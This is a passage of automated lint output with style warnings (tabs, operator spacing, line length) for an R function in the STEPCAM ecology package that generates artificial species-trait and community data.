{\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:50:65:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:51:30:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:51:49:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^\n```\n[R/generateArtificialData.R:53:16:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L54) *style:* **lines should not be more than 80 characters.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:54:43:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                         ~^~~\n```\n[R/generateArtificialData.R:54:77:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                                                           ~^~\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L56) *style:* **lines should not be more than 80 characters.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:56:27:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                         ~^~~\n```\n[R/generateArtificialData.R:56:31:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                              ^\n```\n[R/generateArtificialData.R:56:57:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                       ~^~\n```\n[R/generateArtificialData.R:56:90:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                                                        ~^~\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:57:29:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:58:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L58) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:59:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L59) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:63:11:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L63) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n          ^\n```\n[R/generateArtificialData.R:63:58:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:65:14:](https://github.com/thijsjanzen/STEPCAM/blob/ae6bace8e017496d3896404dee59b9b6c5cd64da/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- 